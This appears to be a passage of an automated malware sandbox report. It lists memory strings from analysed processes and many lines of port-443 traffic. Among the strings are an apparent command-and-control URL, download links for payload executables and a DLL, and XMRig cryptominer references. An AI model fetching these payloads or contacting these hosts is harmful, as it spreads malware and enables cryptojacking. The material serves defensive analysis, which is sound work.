Source: Cerker.exe, 0000002F.00000003.2335447785.00000000010B3000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 0000002F.00000003.2440270925.00000000010AF000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 0000002F.00000003.2309975875.00000000010B3000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 0000002F.00000003.2309853835.00000000010AF000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 0000002F.00000003.2415497371.00000000010AF000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 0000002F.00000003.2363742815.00000000010B3000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 0000002F.00000003.2378561693.00000000010AF000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 0000002F.00000003.2321860118.00000000010AF000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 0000002F.00000003.2363548396.00000000010AF000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 0000002F.00000003.2348735064.00000000010AF000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 0000002F.00000003.2335008330.00000000010AF000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 0000002F.00000003.2401985089.00000000010AF000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 0000002F.00000003.2390362622.00000000010AF000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 0000002F.00000003.2322133127.00000000010B3000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 0000002F.00000003.2427060889.00000000010AF000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 0000002F.00000003.2349814314.00000000010B3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fusionflow-meta.net:443/socket/?
Source: Cerker.exe, 0000002F.00000003.2335447785.00000000010B3000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 0000002F.00000003.2309975875.00000000010B3000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 0000002F.00000003.2309853835.00000000010AF000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 0000002F.00000003.2321860118.00000000010AF000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 0000002F.00000003.2335008330.00000000010AF000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 0000002F.00000003.2322133127.00000000010B3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fusionflow-meta.net:443/socket/?/~
Source: Cerker.exe, 0000002F.00000003.2335447785.00000000010B3000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 0000002F.00000003.2309975875.00000000010B3000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 0000002F.00000003.2309853835.00000000010AF000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 0000002F.00000003.2363742815.00000000010B3000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 0000002F.00000003.2321860118.00000000010AF000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 0000002F.00000003.2363548396.00000000010AF000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 0000002F.00000003.2348735064.00000000010AF000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 0000002F.00000003.2335008330.00000000010AF000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 0000002F.00000003.2322133127.00000000010B3000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 0000002F.00000003.2349814314.00000000010B3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fusionflow-meta.net:443/socket/?id=5BCFD53E0C18D2560D8AF
Source: Cerker.exe, 0000002F.00000003.2322133127.00000000010B3000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 0000002F.00000003.2427060889.00000000010AF000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 0000002F.00000003.2349814314.00000000010B3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fusionflow-meta.net:443/socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453
Source: svchost.exe, 00000001.00000003.1637375313.0000025614AC2000.00000004.00000800.00020000.00000000.sdmp, edb.log.1.dr, qmgr.db.1.dr	String found in binary or memory: https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6
Source: edb.log.1.dr, qmgr.db.1.dr	String found in binary or memory: https://g.live.com/odclientsettings/Prod.C:
Source: edb.log.1.dr, qmgr.db.1.dr	String found in binary or memory: https://g.live.com/odclientsettings/ProdV2
Source: edb.log.1.dr, qmgr.db.1.dr	String found in binary or memory: https://g.live.com/odclientsettings/ProdV2.C:
Source: svchost.exe, 00000001.00000003.1637375313.0000025614AC2000.00000004.00000800.00020000.00000000.sdmp, edb.log.1.dr	String found in binary or memory: https://g.live.com/odclientsettings/ProdV2?OneDriveUpdate=f359a5df14f97b6802371976c96
Source: aspnet_compiler.exe, 0000001A.00000002.4131368164.0000020D46C13000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/DamnCrypt/Zd8fux7fzhe2u7w/releases/download/Test/plugin3.dll
Source: powershell.exe, 0000000B.00000002.2226385244.000002035978A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: 52i.exe, 00000003.00000002.1805008168.00000202F80F5000.00000004.00000800.00020000.00000000.sdmp, 52i.exe, 00000003.00000002.1749075284.0000020280530000.00000004.08000000.00040000.00000000.sdmp, 52i.exe, 00000003.00000002.1805008168.00000202F8196000.00000004.00000800.00020000.00000000.sdmp, IIZS2TRqf69aZbLAX3cf3edn.exe, 00000025.00000002.2092329177.000002B28006E000.00000004.00000800.00020000.00000000.sdmp, IIZS2TRqf69aZbLAX3cf3edn.exe, 00000025.00000002.2158620640.000002B290676000.00000004.00000800.00020000.00000000.sdmp, SmLAztxc1o8yfogkJXrRjbDt.exe, 00000028.00000002.2065045219.0000018157F90000.00000004.00000800.00020000.00000000.sdmp, SmLAztxc1o8yfogkJXrRjbDt.exe, 00000028.00000002.2078804630.0000018168445000.00000004.00000800.00020000.00000000.sdmp, SmLAztxc1o8yfogkJXrRjbDt.exe, 00000028.00000002.2078804630.00000181684E6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/mgravell/protobuf-net
Source: 52i.exe, 00000003.00000002.1805008168.00000202F80F5000.00000004.00000800.00020000.00000000.sdmp, 52i.exe, 00000003.00000002.1749075284.0000020280530000.00000004.08000000.00040000.00000000.sdmp, 52i.exe, 00000003.00000002.1805008168.00000202F8196000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 0000000C.00000002.2145743704.000001D9AAA0C000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 0000001A.00000002.4181122584.0000020D570FC000.00000004.00000800.00020000.00000000.sdmp, IIZS2TRqf69aZbLAX3cf3edn.exe, 00000025.00000002.2092329177.000002B28006E000.00000004.00000800.00020000.00000000.sdmp, IIZS2TRqf69aZbLAX3cf3edn.exe, 00000025.00000002.2158620640.000002B290676000.00000004.00000800.00020000.00000000.sdmp, SmLAztxc1o8yfogkJXrRjbDt.exe, 00000028.00000002.2065045219.0000018157F90000.00000004.00000800.00020000.00000000.sdmp, SmLAztxc1o8yfogkJXrRjbDt.exe, 00000028.00000002.2078804630.0000018168445000.00000004.00000800.00020000.00000000.sdmp, SmLAztxc1o8yfogkJXrRjbDt.exe, 00000028.00000002.2078804630.00000181684E6000.00000004.00000800.00020000.00000000.sdmp, SmLAztxc1o8yfogkJXrRjbDt.exe, 00000028.00000002.2065045219.0000018157F36000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/mgravell/protobuf-netJ
Source: 52i.exe, 00000003.00000002.1805008168.00000202F80F5000.00000004.00000800.00020000.00000000.sdmp, 52i.exe, 00000003.00000002.1749075284.0000020280530000.00000004.08000000.00040000.00000000.sdmp, 52i.exe, 00000003.00000002.1805008168.00000202F8196000.00000004.00000800.00020000.00000000.sdmp, IIZS2TRqf69aZbLAX3cf3edn.exe, 00000025.00000002.2092329177.000002B28006E000.00000004.00000800.00020000.00000000.sdmp, IIZS2TRqf69aZbLAX3cf3edn.exe, 00000025.00000002.2158620640.000002B290676000.00000004.00000800.00020000.00000000.sdmp, SmLAztxc1o8yfogkJXrRjbDt.exe, 00000028.00000002.2065045219.0000018157F90000.00000004.00000800.00020000.00000000.sdmp, SmLAztxc1o8yfogkJXrRjbDt.exe, 00000028.00000002.2078804630.0000018168445000.00000004.00000800.00020000.00000000.sdmp, SmLAztxc1o8yfogkJXrRjbDt.exe, 00000028.00000002.2078804630.00000181684E6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/mgravell/protobuf-neti
Source: powershell.exe, 0000000B.00000002.2475758964.00000203695D7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: svchost.exe, 00000001.00000003.1637375313.0000025614AC2000.00000004.00000800.00020000.00000000.sdmp, edb.log.1.dr, qmgr.db.1.dr	String found in binary or memory: https://oneclient.sfx.ms/Win/Installers/23.194.0917.0001/amd64/OneDriveSetup.exe
Source: edb.log.1.dr	String found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/OneDriveSetup.exe.C:
Source: 52i.exe, 00000003.00000002.1805008168.00000202F80F5000.00000004.00000800.00020000.00000000.sdmp, 52i.exe, 00000003.00000002.1749075284.0000020280530000.00000004.08000000.00040000.00000000.sdmp, 52i.exe, 00000003.00000002.1805008168.00000202F8196000.00000004.00000800.00020000.00000000.sdmp, IIZS2TRqf69aZbLAX3cf3edn.exe, 00000025.00000002.2092329177.000002B28006E000.00000004.00000800.00020000.00000000.sdmp, IIZS2TRqf69aZbLAX3cf3edn.exe, 00000025.00000002.2158620640.000002B290676000.00000004.00000800.00020000.00000000.sdmp, SmLAztxc1o8yfogkJXrRjbDt.exe, 00000028.00000002.2065045219.0000018157F90000.00000004.00000800.00020000.00000000.sdmp, SmLAztxc1o8yfogkJXrRjbDt.exe, 00000028.00000002.2078804630.0000018168445000.00000004.00000800.00020000.00000000.sdmp, SmLAztxc1o8yfogkJXrRjbDt.exe, 00000028.00000002.2078804630.00000181684E6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/11564914/23354;
Source: IIZS2TRqf69aZbLAX3cf3edn.exe, 00000025.00000002.2092329177.000002B28006E000.00000004.00000800.00020000.00000000.sdmp, IIZS2TRqf69aZbLAX3cf3edn.exe, 00000025.00000002.2158620640.000002B290676000.00000004.00000800.00020000.00000000.sdmp, YAPNXRPmcarcR4ZDgC81Tbdk.exe, 00000026.00000002.2144035452.00000209CF2A9000.00000004.00000800.00020000.00000000.sdmp, SmLAztxc1o8yfogkJXrRjbDt.exe, 00000028.00000002.2065045219.000001815802D000.00000004.00000800.00020000.00000000.sdmp, SmLAztxc1o8yfogkJXrRjbDt.exe, 00000028.00000002.2065045219.0000018157F90000.00000004.00000800.00020000.00000000.sdmp, SmLAztxc1o8yfogkJXrRjbDt.exe, 00000028.00000002.2078804630.0000018168445000.00000004.00000800.00020000.00000000.sdmp, SmLAztxc1o8yfogkJXrRjbDt.exe, 00000028.00000002.2078804630.00000181684E6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/14436606/23354
Source: 52i.exe, 00000003.00000002.1805008168.00000202F80F5000.00000004.00000800.00020000.00000000.sdmp, 52i.exe, 00000003.00000002.1749075284.0000020280530000.00000004.08000000.00040000.00000000.sdmp, 52i.exe, 00000003.00000002.1805008168.00000202F8196000.00000004.00000800.00020000.00000000.sdmp, IIZS2TRqf69aZbLAX3cf3edn.exe, 00000025.00000002.2158620640.000002B290676000.00000004.00000800.00020000.00000000.sdmp, SmLAztxc1o8yfogkJXrRjbDt.exe, 00000028.00000002.2078804630.0000018168445000.00000004.00000800.00020000.00000000.sdmp, SmLAztxc1o8yfogkJXrRjbDt.exe, 00000028.00000002.2078804630.00000181684E6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/2152978/23354
Source: RegAsm.exe, 00000002.00000002.2080894884.00000000014F1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://tmpfiles.org/
Source: RegAsm.exe, 00000002.00000002.2080894884.000000000155A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://tmpfiles.org/dl/12050075/loli.exe
Source: RegAsm.exe, 00000002.00000002.2080894884.000000000155A000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2088920952.00000000040D0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://tmpfiles.org/dl/12050266/googleupdats.exe
Source: aspnet_compiler.exe, 0000001A.00000002.4181122584.0000020D57D21000.00000004.00000800.00020000.00000000.sdmp, AddInProcess.exe, 0000002E.00000002.4108997136.0000000140465000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://xmrig.com/benchmark/%s
Source: aspnet_compiler.exe, 0000001A.00000002.4181122584.0000020D57D21000.00000004.00000800.00020000.00000000.sdmp, AddInProcess.exe, 0000002E.00000002.4108997136.0000000140465000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://xmrig.com/docs/algorithms
Source: aspnet_compiler.exe, 0000001A.00000002.4181122584.0000020D57D21000.00000004.00000800.00020000.00000000.sdmp, AddInProcess.exe, 0000002E.00000002.4108997136.0000000140465000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://xmrig.com/wizard
Source: aspnet_compiler.exe, 0000001A.00000002.4181122584.0000020D57D21000.00000004.00000800.00020000.00000000.sdmp, AddInProcess.exe, 0000002E.00000002.4108997136.0000000140465000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://xmrig.com/wizard%s

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49986
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49864
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49862
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49983
Source: unknown	Network traffic detected: HTTP traffic on port 49926 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49981
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50175
Source: unknown	Network traffic detected: HTTP traffic on port 49800 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50055
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50057
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50178
Source: unknown	Network traffic detected: HTTP traffic on port 49961 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49852 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50180
Source: unknown	Network traffic detected: HTTP traffic on port 50131 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50060
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50184
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50062
Source: unknown	Network traffic detected: HTTP traffic on port 50068 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49859
Source: unknown	Network traffic detected: HTTP traffic on port 49881 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49857
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49978
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown	Network traffic detected: HTTP traffic on port 49772 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49976
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49854
Source: unknown	Network traffic detected: HTTP traffic on port 49841 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50194 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50085 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49852
Source: unknown	Network traffic detected: HTTP traffic on port 49950 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49973
Source: unknown	Network traffic detected: HTTP traffic on port 50039 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49850
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49970
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50186
Source: unknown	Network traffic detected: HTTP traffic on port 49967 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50064
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50067
Source: unknown	Network traffic detected: HTTP traffic on port 50091 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50113 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50188
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50068
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50070
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50191
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50193
Source: unknown	Network traffic detected: HTTP traffic on port 50159 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49823 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50073
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50194
Source: unknown	Network traffic detected: HTTP traffic on port 49978 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50080 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49847
Source: unknown	Network traffic detected: HTTP traffic on port 49886 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49967
Source: unknown	Network traffic detected: HTTP traffic on port 49869 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49844
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49965
Source: unknown	Network traffic detected: HTTP traffic on port 50120 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49841
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49961
Source: unknown	Network traffic detected: HTTP traffic on port 50009 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50147 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50075
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50196
Source: unknown	Network traffic detected: HTTP traffic on port 49989 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50057 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50199
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50077
Source: unknown	Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49892 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50096 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50108 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50073 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50080
Source: unknown	Network traffic detected: HTTP traffic on port 49933 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50028 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50082
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50085
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49959
Source: unknown	Network traffic detected: HTTP traffic on port 49847 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49921 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49955
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49953
Source: unknown	Network traffic detected: HTTP traffic on port 50062 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49864 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49950
Source: unknown	Network traffic detected: HTTP traffic on port 49944 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50088
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50091
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50094
Source: unknown	Network traffic detected: HTTP traffic on port 50136 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50178 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49983 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50096
Source: unknown	Network traffic detected: HTTP traffic on port 49955 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50023 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49948
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49823
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49944
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50017
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50138
Source: unknown	Network traffic detected: HTTP traffic on port 50193 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49786
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49785
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50019
Source: unknown	Network traffic detected: HTTP traffic on port 49813 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49783
Source: unknown	Network traffic detected: HTTP traffic on port 50017 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50149 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50131
Source: unknown	Network traffic detected: HTTP traffic on port 49916 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50011
Source: unknown	Network traffic detected: HTTP traffic on port 50055 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49785 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50014
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50134
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50136
Source: unknown	Network traffic detected: HTTP traffic on port 50049 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50161 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49897
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50028
Source: unknown	Network traffic detected: HTTP traffic on port 50144 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50149
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49773
Source: unknown	Network traffic detected: HTTP traffic on port 49862 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49894
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49772
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49892
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50021
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50141
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50023
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50144
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50025
Source: unknown	Network traffic detected: HTTP traffic on port 49897 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50027
Source: unknown	Network traffic detected: HTTP traffic on port 49879 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50147
Source: unknown	Network traffic detected: HTTP traffic on port 49911 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50021 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50151
Source: unknown	Network traffic detected: HTTP traffic on port 50138 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50155 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50067 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50103 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49905 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49889
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49886
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50039
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49884
Source: unknown	Network traffic detected: HTTP traffic on port 50166 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50011 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49928 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49881
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50031
Source: unknown	Network traffic detected: HTTP traffic on port 49857 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50155
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50157
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50035
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50159
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50037
Source: unknown	Network traffic detected: HTTP traffic on port 49940 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50005 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50041
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50161
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49879
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49757
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49999
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49877
Source: unknown	Network traffic detected: HTTP traffic on port 49973 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49997
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49874
Source: unknown	Network traffic detected: HTTP traffic on port 49923 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49994
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49872
Source: unknown	Network traffic detected: HTTP traffic on port 49818 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49992
Source: unknown	Network traffic detected: HTTP traffic on port 50171 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50043
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50164
Source: unknown	Network traffic detected: HTTP traffic on port 49786 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50166
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50044
Source: unknown	Network traffic detected: HTTP traffic on port 50188 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49874 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50046
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50049
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50169
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50171
Source: unknown	Network traffic detected: HTTP traffic on port 50027 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50052
Source: unknown	Network traffic detected: HTTP traffic on port 50044 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50126 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50199 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49869
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown	Network traffic detected: HTTP traffic on port 49792 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49989
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49867
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49746
Source: unknown	Network traffic detected: HTTP traffic on port 50122 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49970 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50007 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50151 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50116 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50094 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49803 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50180 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49889 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49900 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50106
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50108
Source: unknown	Network traffic detected: HTTP traffic on port 50060 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50100
Source: unknown	Network traffic detected: HTTP traffic on port 50186 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49872 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50077 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50103
Source: unknown	Network traffic detected: HTTP traffic on port 50025 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50134 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49981 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49999 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50088 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50116
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50118
Source: unknown	Network traffic detected: HTTP traffic on port 49844 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49918 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50111
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50113
Source: unknown	Network traffic detected: HTTP traffic on port 49793 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49986 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49850 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50031 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49992 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50043 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50175 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50100 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49757 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49799
